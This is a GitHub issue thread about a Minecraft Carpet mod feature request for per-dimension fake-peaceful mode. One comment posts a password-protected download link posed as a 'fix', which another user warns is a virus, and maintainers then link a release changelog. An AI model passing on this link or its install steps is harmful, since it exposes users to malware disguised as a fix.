### ISSUE TITLE
申请伪和平独立维度实现，一共3维度，组合一下all，O，N，E，O/N，O/E，N/E，false

### ISSUE THREAD

**Issue by vocaloidkiss** [Minecraft-AMS/Carpet-AMS-Addition#138]
还有一个就是申请伪和平独立维度实现，一共3维度，组合一下all，O，N，E，O/N，O/E，N/E，false

_Originally posted by @vocaloidkiss in https://github.com/Minecraft-AMS/Carpet-AMS-Addition/issues/137#issuecomment-2309902620_

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by vocaloidkiss** [comment]
注意，用户JONTY650413 提供文件为病毒文件，请勿下载！！！！！

**Comment by vocaloidkiss** [comment]
@wendavid552 please

**Comment by 1024-byteeeee** [comment]
# Carpet AMS Addition v2.46.0
### Changelog
#### https://minecraft-ams.github.io/carpetamsaddition/2024/09/09/v2.46.0/

**Comment by 1024-byteeeee** [comment]
# Carpet AMS Addition v2.46.0
### Changelog
#### https://minecraft-ams.github.io/carpetamsaddition/2024/09/09/v2.46.0/
